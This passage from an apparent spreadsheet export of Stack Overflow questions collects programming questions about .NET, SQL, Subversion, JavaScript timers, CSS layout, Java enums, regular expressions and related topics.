&lt;p&gt;I have a bunch of SOAP Web Services. They all have an HTTP POST and GET interfaces along with the SOAP interface. I believe POST and GET are offered by default when building SOAP Web Services in .NET/Visual Studio.&lt;/p&gt;
&lt;p&gt;These methods either: (1) get information, e.g., provide your username, password and a transaction ID -&gt; get an XML with your transaction's status; (2) create a transaction by providing your username, password and some data -&gt; get an XML with your transaction ID.&lt;/p&gt;
&lt;p&gt;My question is: would it be accurate to say I have a RESTful web service for those Ruby guys out there?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best practices when applying conditional formatting in data bound controls?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Repeater contol bound to a custom object (an EntitySpaces query) and have noticed there are a couple of ways to conditionally format the values being displayed. &lt;/p&gt;
&lt;p&gt;1) From my aspx I can call a method in my code-behind and pass through the bound value and use that to drive any conditional logic:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        &amp;lt;a class="star" href="&amp;lt;%#MakePackageSelectionUrl((int)DataBinder.Eval(Container.DataItem, "PackageId"))%&amp;gt;"&amp;gt;
and then in the code-dehind:
    protected string MakePackageSelectionUrl(int packageId)
    {
              return string.Format("/Packages/NoAjax/ToggleStar.aspx?p={0}&amp;amp;amp;s={1}&amp;amp;amp;st={2}", packageId, _streamId, (int)_phase);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;2) I can hook into the ItemDataBound event, retrieve e.Item.DataItem as a DataRowView and then go crazy:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    protected void PackageList_ItemDataBound(Object sender, RepeaterItemEventArgs e)
    {
        if (e.Item.ItemType != ListItemType.Item &amp;amp;&amp;amp; e.Item.ItemType != ListItemType.AlternatingItem) { return; }
        DataRowView details = (DataRowView)e.Item.DataItem;
        EncodePackageName(e, details);
        EncodeStatusName(e);
        DisplayStarImage(e, details);
    }
    private static void EncodePackageName(RepeaterItemEventArgs e, DataRowView dr)
    {
        HtmlAnchor p = (HtmlAnchor)e.Item.FindControl("packageLink");
        if (p != null)
        {
            p.HRef = string.Format("/Packages/View.aspx?p={0}", dr["packageId"]);
            p.InnerHtml = HttpUtility.HtmlEncode((string)dr["packageName"]);
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've also noticed that using e.Item.FindControl() in the code-behind requires runat="server" on the control in the aspx which has a nasty habit of encoding ids and generally messing up the HTML.&lt;/p&gt;
&lt;p&gt;I'm keen to hear from anyone that has come up with a nice approach for dealing with these sorts of issues.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What third-party ASP.NET controls or libraries can you not live without?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a project right now, and I have a few must-have controls that I include in most sites I build. Often times it strikes me that the best controls are not always that well publicized so I thought I would ask the Stack Overflow community about their favorite third-party ASP.NET controls - the ones you just have to have on a project because they are so valuable.&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;Some people have asked for clarification and the controls that I include.&lt;/p&gt;
&lt;p&gt;First, I am not talking about just user interface controls but libraries as well, a few people have mentioned &lt;a href="http://en.wikipedia.org/wiki/Log4j#Ports" rel="nofollow"&gt;log4net&lt;/a&gt; which falls into this category.&lt;/p&gt;
&lt;p&gt;For me, there is one third-party control package which I find to be masterfully done and an incredible value for the money - it is Peter Blum's Data Entry Suite. As Scott Hanselman says, it is a "complete re-imagining of the ASP.NET Validation framework" and it is loaded with controls for rich interaction with data entry forms.&lt;/p&gt;
&lt;p&gt;Outside of that, I am really digging &lt;a href="http://en.wikipedia.org/wiki/JQuery" rel="nofollow"&gt;jQuery&lt;/a&gt; lately but like most of the answers so far also use the ASP.NET Ajax Control Toolkit in many places.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a cyclic data structure good for?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was just reading through &lt;a href="http://books.google.com/books?id=1HxWGezDZcgC&amp;amp;lpg=PP1&amp;amp;dq=learning%20python&amp;amp;pg=PA254#v=onepage&amp;amp;q=cyclic&amp;amp;f=false" rel="nofollow"&gt;"Learning Python" by Mark Lutz and came across this code sample&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
&gt;&gt;&gt; L = ['grail']
&gt;&gt;&gt; L.append(L)
&gt;&gt;&gt; L
['grail', [...]]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It was identified as a cyclic data structure.&lt;/p&gt;
&lt;p&gt;So I was wondering, and here is my question:&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;What is a 'cyclic data structure' used for in real life programming?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;There seems to be a little confusion, which i think stems from the very brief code sample... here's a few more lines using the same object L&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
&gt;&gt;&gt; L[0]
'grail'
&gt;&gt;&gt; L[1][0]
'grail'
&gt;&gt;&gt; L[1][1][0]
'grail'
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to get t4 files to build in visual studio?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I build my c# solution the .tt files will not create the .cs file outputs. But if I right click the .tt files one at a time in solution explorer and select "Run Custom Tool" the .cs is generated, so the build tool setting is correct. What do I do to get the overall solution build to force the custom tool to run on the .tt files?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detecting that a ThreadPool WorkItem has completed/waiting for completion</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For whatever reason, &lt;code&gt;ThreadPool&lt;/code&gt;'s &lt;code&gt;QueueWorkItem&lt;/code&gt; doesn't return an &lt;code&gt;IAsyncResult&lt;/code&gt; or some other handle to the work item, which would allow to wait until it's completed. There are &lt;code&gt;RegisterWait...&lt;/code&gt; methods, but you have to pass a &lt;code&gt;WaitHandle&lt;/code&gt; and creating them is expensive (see &lt;code&gt;IAsyncResult&lt;/code&gt; documentation, which advises you to delay creating a &lt;code&gt;WaitHandle&lt;/code&gt; until requested). The Task Parallel Library will fix this lack, but there is a long wait before that's available. So, are there any problems with this design:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Concurrent&amp;lt;T&amp;gt; {
    private ManualResetEvent _resetEvent;
    private T _result;
    public Concurrent(Func&amp;lt;T&amp;gt; f) {
        ThreadPool.QueueUserWorkItem(_ =&amp;gt; {
                                         _result = f();
                                         if (_resetEvent != null)
                                             _resetEvent.Set();
                                     });
    }
    public WaitHandle WaitHandle {
        get {
            if (_resetEvent == null)
                _resetEvent = new ManualResetEvent(_result != null);
            return _resetEvent;
        }
    ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;EDIT:
I asked a &lt;a href="http://stackoverflow.com/questions/406915/using-begininvoke-endinvoke-in-a-multithreaded-fashion-how-do-asynccallback-asy"&gt;follow-up question about the concerns which arise when using async delegates instead of the ThreadPool&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Methods for interacting with a Pervasive SQL database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm in the process of developing a web interface to a service business management application that uses a Pervasive SQL database to store information (not my choice, by the way). At the moment, I'm using the official Pervasive SqlClient implementation with a custom set of query generation classes so I can write code like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;new SelectQuery().From("CUSTOMER").Fields("CUSTOMERNBR", "NAME");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It's working fine so far, but I'm running into little problems here and there. Rather than keep going in this direction, I'd rather use a proven DAL. However, I'm not having very much luck in finding a DAL system that can interact with a Pervasive database.&lt;/p&gt;
&lt;p&gt;Opf3 has a Pervasive storage provider, but I've never heard of that framework before and the website only displays the Pervasive v8 logo, while I need something that will work with v9.5 and, in the future, v10.&lt;/p&gt;
&lt;p&gt;I tried writing an NHibernate provider, but that ended up being even more of a headache than my current query generation system.&lt;/p&gt;
&lt;p&gt;What do you suggest? I'm on a very rushed timeline, so I'd like something that will integrate as easily as possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Subversion can I be a user other than my login name?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to know how to get &lt;code&gt;Subversion&lt;/code&gt; to change the name that my changes appear under.&lt;/p&gt;
&lt;p&gt;I'm just starting to use &lt;code&gt;Subversion&lt;/code&gt;. I'm currently using it to version control code on an XP laptop where I'm always logged in under my wife's name. I'd like the subversion DB to show the changes under my name.&lt;/p&gt;
&lt;p&gt;Later on I'll replicate the DB so it is accessible to the whole house. My wife uses the office computer where she is always logged in under my name. I'll probably set it up so that it automatically checks in modified documents... preferably under her name.&lt;/p&gt;
&lt;p&gt;Eventually I'll probably be using it from a linux machine under another username.&lt;/p&gt;
&lt;p&gt;Is there some way to modify the user environment to change the user name that Subversion calls you? I'd expect something like setting &lt;code&gt;SVN_USERNAME='Mark'&lt;/code&gt; which would override however it usually gets the name.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; It looks like the &lt;code&gt;--username&lt;/code&gt; flag that Michael referred to does work to change the name reported by &lt;code&gt;"svn stat"&lt;/code&gt;, even for local file: repositories. In addition, it is sticky so you don't need to specify it for the next command. I even rebooted and it still used the &lt;code&gt;"--username"&lt;/code&gt; value from my previous boot.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Project source or published DLL's?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When reusing code (for example, a Util library you created), do you add its project to your solution or use a compiled/published DLL from the Util library?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why are compilers so stupid?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I always wonder why compilers can't figure out simple things that are obvious to the human eye. They do lots of simple optimizations, but never something even a little bit complex. For example, this code takes about 6 seconds on my computer to print the value zero (using java 1.6):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int x = 0;
for (int i = 0; i &amp;lt; 100 * 1000 * 1000 * 1000; ++i) {
    x += x + x + x + x + x;
}
System.out.println(x);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It is totally obvious that x is never changed so no matter how often you add 0 to itself it stays zero. So the compiler could in theory replace this with System.out.println(0).&lt;/p&gt;
&lt;p&gt;Or even better, this takes 23 seconds:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public int slow() {
    String s = "x";
    for (int i = 0; i &amp;lt; 100000; ++i) {
        s += "x";
    }
    return 10;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;First the compiler could notice that I am actually creating a string s of 100000 "x" so it could automatically use s StringBuilder instead, or even better directly replace it with the resulting string as it is always the same. Second, It does not recognize that I do not actually use the string at all, so the whole loop could be discarded!&lt;/p&gt;
&lt;p&gt;Why, after so much manpower is going into fast compilers, are they still so relatively dumb?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: Of course these are stupid examples that should never be used anywhere. But whenever I have to rewrite a beautiful and very readable code into something unreadable so that the compiler is happy and produces fast code, I wonder why compilers or some other automated tool can't do this work for me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Large amount of data - what is the best way to send them?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;we have this scenario:&lt;/p&gt;
&lt;p&gt;A server which contains needed data and client component which these data wants.&lt;/p&gt;
&lt;p&gt;On the server are stored 2 types of data:
 - some information - just a couple of strings basically
 - binary data&lt;/p&gt;
&lt;p&gt;We have a problem with getting binary data. Both sides are written in Java 5 so we have couple of ways....&lt;/p&gt;
&lt;p&gt;Web Service is not the best solution because of speed, memory etc...&lt;/p&gt;
&lt;p&gt;So, What would you prefer?&lt;/p&gt;
&lt;p&gt;I would like to miss low level socket connection if possible...&lt;/p&gt;
&lt;p&gt;thanks in advance&lt;/p&gt;
&lt;p&gt;Vitek&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET Rectangular Arrays: how to access in a loop?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Basically you have two ways for doing this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for (int x = 0; x &amp;lt; UPPER_X; x++)
    for (int y = 0; y &amp;lt; UPPER_Y; y++)
    {        
        arr1[x, y] = get_value();
        arr2[y, x] = get_value();
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The only difference is what variable to change in the inner loop: first or second. I heard that the results differ from language to language. &lt;/p&gt;
&lt;p&gt;What is right order for .NET?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using svn with Textmate</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Coming from IDEs with full-blown svn support such as Eclipse and Netbeans, I'm wondering what is the recommended way to use svn with Textmate? Is it all manual, ie using the command line, or are there features that allow you to diff/checkin/merge/etc in Textmate itself?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get the id of inserted row using C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a query to insert a row into a table, which has a field called ID, which is populated using an AUTO_INCREMENT on the column. I need to get this value for the next bit of functionality, but when I run the following, it always returns 0 even though the actual value is not 0:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MySqlCommand comm = connect.CreateCommand();
comm.CommandText = insertInvoice;
comm.CommandText += "\'" + invoiceDate.ToString("yyyy:MM:dd hh:mm:ss") + "\', " + bookFee + ", " + adminFee + ", " + totalFee + ", " + customerID +  ")";
int id = Convert.ToInt32(comm.ExecuteScalar());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;According to my understanding, this should return the ID column, but it just returns 0 every time. Any ideas?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;When I run:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"INSERT INTO INVOICE (INVOICE_DATE, BOOK_FEE, ADMIN_FEE, TOTAL_FEE, CUSTOMER_ID) VALUES ('2009:01:01 10:21:12', 50, 7, 57, 2134);last_insert_id();"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'last_insert_id()' at line 1"}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What is a RESTful way of monitoring a REST resource for changes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If there is a REST resource that I want to monitor for changes or modifications from other clients, what is the best (and most RESTful) way of doing so?&lt;/p&gt;
&lt;p&gt;One idea I've had for doing so is by providing specific resources that will keep the connection open rather than returning immediately if the resource does not (yet) exist. For example, given the resource:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/game/17/playerToMove
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;a "GET" on this resource might tell me that it's my opponent's turn to move. Rather than continually polling this resource to find out when it's my turn to move, I might note the move number (say 5) and attempt to retrieve the next move:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/game/17/move/5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In a "normal" REST model, it seems a GET request for this URL would return a 404 (not found) error. However, if instead, the server kept the connection open until my opponent played his move, i.e.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PUT /game/17/move/5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;then the server could return the contents that my opponent PUT into that resource. This would both provide me with the data I need, as well as a sort of notification for when my opponent has moved without requiring polling.&lt;/p&gt;
&lt;p&gt;Is this sort of scheme RESTful? Or does it violate some sort of REST principle?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing Pointer To An Array Of Arrays Through Function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There is a pointer-to-an-Array of Arrays i.e. NameList in the code.   I want the contents of each of the Arrays in the Pointer(NameList) to get printed one by one.  The below code is not able do the task.  Pls. help.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int Data1[] = {10,10};
int Data2[] = {20,20};
int Data3[] = {30,30};
int *NameList[] = {Data1, Data2, Data3};
main()
{  Function(NameList); }
Function(int *ArrayPointer)
  {
    int i, j, index=0;
    for (i=0; i &amp;lt; 3; i++)
      {
        for (j=0; j &amp;lt; 2; j++)
          {
             //It does not print the data
             printf("\nName: %s",  ArrayPointer[index++]);
          } 
        index=0;         //Counter reset to 0
        ArrayPointer++;  //Pointer is incremented by one to pick next array in the pointer
      }
  }
print("code sample");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Another note from the original poster of the question:&lt;/p&gt;
&lt;p&gt;I have completed a pacman game in Turbo C. I was polishing some graphics routines so that it can be reused again easily. This is only a small sample created for the purpose of help and understanding the concept. All data in the code actually are char arrays for sprites. Now i simply want to call a function passing the pointer so that each arrays in the pointer are drawn to the screen. How can this code be modified to handle this? Im actually stuck up here.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to have event occur n times?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use the following code to create countdowns in Javascript. n is the number of times to repeat, freq is the number of milliseconds to wait before executing, funN is a function to call on each iteration (typically a function that updates part of the DOM) and funDone is the function to call when the countdown is complete. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function timer(n, freq, funN, funDone)
{
	if(n == 0){
		funDone();
	}else{
		setTimeout(function(){funN(n-1); timer(n-1, freq, funN, funDone);}, freq);		
	}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It can be called like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    timer(10,
      1000, /* 1 second */
      function(n){console.log("(A) Counting: "+n);},
      function() {console.log("(A) Done!");}
     );
    timer(10,
      500,
      function(n){console.log("(B) Counting: "+n);},
      function() {console.log("(B) Done!");}
     );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The advantage of this is that I can call timer() as many times as I want without worrying about global variables etc. Is there a better way to do this? Is there a clean way to make setInterval stop after a certain number of calls (without using global variables)? This code also creates a new lambda function with each call to setTimeout which seems like it could be problematic for large countdowns (I'm not sure how javascript's garbage collector handles this). &lt;/p&gt;
&lt;p&gt;Is there a better way to do this? Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Web data grid of infragistic controls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a web project where i need to use web data grid of infragistic controls.
I have problem to customise the header layout. I did not find event like InisalizeLayOut in ultrawebgrid. My problem is that i want to row in header. Please give me your valuable suggations.
Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I add a file to Subversion that has the same name as a directory that was deleted?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A long time ago I had the following directory structure in my SVN repository&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;trunk/
    data/
        levels/
            1.level
            2.level
            ...
        ...
    ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I deleted the 'levels' directory long ago. Now I want to add a single text file called 'levels' to the 'data' directory, so it will look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;trunk/
    data/
        levels
        ...
    ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now when I try to add the file 'levels', I get this message:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ svn add data/levels
svn: Can't replace 'data/levels' with a node of a differing type; the deletion m
ust be committed and the parent updated before adding 'data/levels'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I solve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does Team Explorer integrate with VS2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have both VS2005 and VS2008 installed on my machine. I was able to install Team Explorer 2008, but could not install Team Explorer 2005 (it kept throwing some error number 2337 which I could not resolve).&lt;/p&gt;
&lt;p&gt;Currently, I am having to launch the VS2008 IDE for using source control, and VS2005 for working on the source code (as the projects and solution files are still in the older VS2005 format). &lt;/p&gt;
&lt;p&gt;Can I TE2008 to work with VS2005 in order to have an integrated experience?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regular expression to match line that doesn't contain a word?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know it's possible to match a word and then reverse the matches using other tools (e.g. &lt;code&gt;grep -v&lt;/code&gt;). However, I'd like to know if it's possible to match lines that &lt;em&gt;don't&lt;/em&gt; contain a specific word (e.g. hede) using a regular expression? &lt;/p&gt;
&lt;p&gt;Input:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;hoho
hihi
haha
hede
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Code:
&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# grep "Regex for doesn't contain hede" Input
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Desired output: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;hoho
hihi
haha
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Add New Column in Infragistics Wingrid</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Infragistics wingrid in my application. I have assigned a datasource to my wingrid. Now i want to add a new column at a specific location.&lt;/p&gt;
&lt;p&gt;Can any one please tell me how can this be performed?&lt;/p&gt;
&lt;p&gt;Regards, Savan.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add bottom padding to a div that contains floating divs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a div that contains other floating divs:&lt;/p&gt;
&lt;p&gt;&amp;lt;div id="parent"&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;lt;div style="float:left;"&amp;gt;text&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;lt;div style="float:left;"&amp;gt;text&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;lt;div style="float:right;"&amp;gt;text&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;/p&gt;
&lt;p&gt;How can I add bottom padding to the parent div and make it work in IE6 (or in other words avoid the bugs in IE6)?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Divide by zero error in stored procedure</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi i executed the following stored procedure in .net web application. Then run the application. I got this error&lt;/p&gt;
&lt;p&gt;" Divide By zero error "&lt;/p&gt;
&lt;p&gt;Stored procedure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE procedure Details(@Stringtext varchar(8000),@SearchStringtext varchar(100))
as begin
SELECT ({fn LENGTH(@Stringtext)}-
{fn LENGTH({fn REPLACE(@Stringtext, @SearchStringtext, '')})})/
{ fn LENGTH(@SearchStringtext)}AS String_Count
end
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What is the best practices in db design when I want to store a value that is either selected from a dropdown list or user-entered?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to find the best way to design the database in order to allow the following scenario:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The user is presented with a dropdown list of Universities (for example)&lt;/li&gt;
&lt;li&gt;The user selects his/her university from the list if it exists&lt;/li&gt;
&lt;li&gt;If the university does not exist, he should enter his own university in a text box (sort of like Other: [___________])&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;how should I design the database to handle such situation given that I might want to sort using the university ID for example (probably only for the built in universities and not the ones entered by users)&lt;/p&gt;
&lt;p&gt;thanks!&lt;/p&gt;
&lt;p&gt;I just want to make it similar to how Facebook handles this situation. If the user selects his Education (by actually typing in the combobox which is not my concern) and choosing one of the returned values, what would Facebook do?&lt;/p&gt;
&lt;p&gt;In my guess, it would insert the UserID and the EducationID in a many-to-many table. Now what if the user is entering is not in the database at all? It is still stored in his profile, but where?
&lt;img src="http://i43.tinypic.com/hufztt.jpg" alt="typing &amp;quot;St&amp;quot;...suggesting Stanford"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i41.tinypic.com/14j56s8.jpg" alt="typing non-existing university"&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you set up your virtual machines?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Recently the buzz of virtualization has reached my workplace where developers trying out virtual machines on their computers. Earlier I've been hearing from several different developers about setting up virtual machine in their desktop computers for sake of keeping their development environments clean.&lt;/p&gt;
&lt;p&gt;There are plenty of Virtual Machine software products in the market:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Microsoft &lt;a href="http://sv.wikipedia.org/wiki/Microsoft_Virtual_PC"&gt;Virtual PC&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Sun &lt;a href="http://www.virtualbox.org/"&gt;VirtualBox&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.vmware.com/"&gt;VMWare&lt;/a&gt; &lt;a href="http://en.wikipedia.org/wiki/VMware_Workstation"&gt;Workstation&lt;/a&gt; or &lt;a href="http://en.wikipedia.org/wiki/VMware_Player"&gt;Player&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Parallell Inc's &lt;a href="http://www.parallels.com/en/products/desktop/"&gt;Parallells Desktop&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm interested to know how you use virtualization effectively in your work. My question is &lt;strong&gt;how do you use Virtual Machines for day-to-day development&lt;/strong&gt; and for what reason?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vertical center an anchor tag within a fieldset</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to vertically center an anchor within a fieldset using CSS but it always appears to align to bottom. Is there any tricks to this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Performance comparisons betweeen enum evaluations and ints</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Would there be difference in speed between&lt;br/&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (myInt == CONST_STATE1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (myEnum == myENUM.State1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in c#?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's your most controversial programming opinion?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is definitely subjective, but I'd like to try to avoid it becoming argumentative. I think it could be an interesting question if people treat it appropriately.&lt;/p&gt;
&lt;p&gt;The idea for this question came from the comment thread from &lt;a href="http://stackoverflow.com/questions/282329/what-are-five-things-you-hate-about-your-favorite-language#282342"&gt;my answer&lt;/a&gt; to the &lt;a href="http://stackoverflow.com/questions/282329"&gt;"What are five things you hate about your favorite language?" question&lt;/a&gt;. I contended that classes in C# should be sealed by default - I won't put my reasoning in the question, but I might write a fuller explanation as an answer to this question. I was surprised at the heat of the discussion in the comments (25 comments currently).&lt;/p&gt;
&lt;p&gt;So, what contentious opinions do &lt;em&gt;you&lt;/em&gt; hold? I'd rather avoid the kind of thing which ends up being pretty religious with relatively little basis (e.g. brace placing) but examples might include things like "unit testing isn't actually terribly helpful" or "public fields are okay really". The important thing (to me, anyway) is that you've got reasons behind your opinions.&lt;/p&gt;
&lt;p&gt;Please present your opinion and reasoning - I would encourage people to vote for opinions which are well-argued and interesting, whether or not you happen to agree with them.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Forcing reload of a html page after a small wait</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a html page A and a link in the page which opens up page B in a new window. How to reload the page A on clicking and opening this link ? &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I should have been more clear. Page B opens in a new window and not as a popup. The hyperlink in question has its target attribute set to _blank. Taking a clue from the answers that I got (Thanks guys !), I tried setting onclick = "window.location.reload()" and it works perfectly fine.&lt;/p&gt;
&lt;p&gt;However I have a problem. In fact another question altogether. How to make sure that the reload of page A waits until the page opened in the new window (page B) loads ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can Java Enumerations be merged (like Bitwise in C#)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way in Java to declare an enumeration whose values can be used together? For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;enum FileAccess { Read, Write, ReadWrite }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is it possible to define ReadWrite as &lt;code&gt;Read | Write&lt;/code&gt; (or anything that would yield the same result)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>It's possible to develop for .net 2.x in Visual Studio 2008?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It's possible to develop only for .net 2.0 running Visual Studio 2008?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to show all ASP.NET web application's loaded/referenced assemblies with version numbers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to show a list of all used assemblies on a dedicated web page inside a ASP.NET web application for debugging and maintainance purposes (there are many instances of this web application on many different servers). The assemblies could be called from the &lt;em&gt;bin folder&lt;/em&gt; or from the &lt;em&gt;GAC&lt;/em&gt;. There are some written by myself, but also third-party assemblies.&lt;/p&gt;
